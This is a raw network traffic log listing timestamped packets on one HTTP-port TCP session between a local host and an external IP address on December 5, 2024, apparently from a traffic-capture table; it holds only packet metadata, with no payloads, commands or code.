Dec 5, 2024 11:40:00.084167957 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.084197044 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.084228992 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.087280035 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.087294102 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.087343931 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.090378046 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.093409061 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.093420982 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.093489885 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.096437931 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.096452951 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.096494913 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.099479914 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.099493980 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.099550962 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.102588892 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.102602005 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.102644920 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.105577946 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.105592966 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.105642080 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.108628988 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.108648062 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.108659983 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.108692884 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.108725071 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.111685991 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.111700058 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.111762047 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.114763021 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.114777088 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.114839077 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.117810965 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.117825985 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.117886066 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.120938063 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.120951891 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.120966911 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.121011972 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.123955965 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.123970032 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.124010086 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.126950979 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.126965046 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.127002001 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.130336046 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.130351067 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.130410910 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.133059978 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.133075953 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.133117914 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.136323929 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.136337996 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.136351109 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.136400938 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.136430025 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.139180899 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.139195919 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.139236927 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.142237902 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.142251968 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.142298937 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.145278931 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.145293951 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.145363092 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.148355007 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.148370028 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.148381948 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.148437023 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.151422977 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.151443005 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.151489973 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.154431105 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.154450893 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.154490948 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.157516003 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.157530069 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.157567024 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.160541058 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.160556078 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.160634995 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.163544893 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.163567066 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.163579941 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.163606882 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.163647890 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.166599035 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.166624069 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.166685104 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.169687033 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.169704914 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.169754982 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.172735929 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.172749996 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.172808886 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.175808907 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.175828934 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.175843000 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.175909996 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.178838015 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.178870916 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.178910017 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.181919098 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.181931973 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.181979895 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.184947968 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.184962034 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.185009003 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.188010931 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.188024998 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.188070059 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.191092014 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.191107035 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.191118002 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.191169024 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.191190004 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.194077969 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.194099903 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.194112062 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.194164991 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.240906000 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.241378069 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.242043972 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.242221117 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.242429018 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.243798018 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.243854046 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.245192051 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.246706963 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.246761084 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.248157024 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.248171091 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.248219013 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.250858068 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.250870943 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.250917912 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.253596067 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.253609896 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.253655910 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.256349087 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.256362915 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.256402016 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.259387970 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.259401083 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.259459972 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.262453079 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.262466908 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.262518883 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.265851021 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.265872955 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.265948057 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.268538952 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.268558025 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.268570900 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.268615007 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.271620035 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.271635056 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.271677971 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.274674892 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.274689913 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.274739027 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.277739048 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.277753115 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.277795076 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.280766010 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.280780077 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.280793905 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.280940056 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.283822060 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.283835888 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.283884048 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.286977053 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.286992073 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.287061930 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.290239096 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.290252924 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.290294886 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.292963982 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.292977095 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.293024063 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.296029091 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.296042919 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.296053886 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.296096087 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.299118996 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.299133062 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.299177885 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.302180052 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.302194118 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.302233934 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.304577112 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.304591894 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.304645061 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.307029963 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.307044983 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.307056904 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.307085991 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.307117939 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.309492111 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.309514046 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.309576988 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.311918020 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.311932087 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.311983109 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.314341068 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.314404964 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.314456940 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.316864014 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.316885948 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.316935062 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.319252014 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.319266081 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.319278955 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.319327116 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.321717978 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.321738958 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.321783066 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.324141979 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.324165106 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.324193954 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.326661110 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.326674938 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.326741934 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.329062939 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.329077005 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.329090118 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.329118967 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.329145908 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.331521034 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.331536055 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.331595898 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.333954096 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.333976984 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.334033966 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.336769104 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.336786985 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.336850882 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.338999033 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.339016914 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.339075089 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.341342926 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.341356993 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.341368914 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.341415882 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.343766928 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.343780994 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.343816042 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.346301079 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.346314907 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.346357107 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.348639965 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.348654032 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.348696947 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.351125956 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.351140976 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.351154089 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.351200104 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.351218939 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.353595972 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.353610992 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.353662014 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.355994940 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.356009960 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.356061935 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.358549118 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.358561993 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.358614922 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.360908985 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.360923052 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.360968113 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.363356113 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.363368034 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.363379002 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.363413095 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.365833044 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.365845919 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.366077900 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.368240118 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.368253946 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.368302107 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.441178083 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.441575050 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.441751003 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.442589998 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.443459034 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.443507910 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.443962097 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.443979979 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.444032907 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.446197033 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.446211100 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.446285009 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.448410988 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.448422909 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.448474884 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.450556993 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.450578928 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.450638056 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.453332901 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.453346968 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.453394890 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.455171108 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.455183983 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.455229998 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.457458019 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.457478046 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.457526922 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.459889889 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.459903955 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.459942102 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.462431908 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.462446928 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.462510109 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.464786053 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.464801073 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.464812994 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.464864016 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.467216015 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.467236042 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.467318058 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.469711065 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.469724894 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.469779015 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.472136021 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.472150087 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.472204924 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.474577904 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.474591970 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.474602938 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.474638939 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.474674940 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.477024078 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.477039099 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.477082014 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.479479074 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.479496956 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.479549885 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.481930971 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.481944084 CET	80	49708	147.45.44.131	192.168.2.6
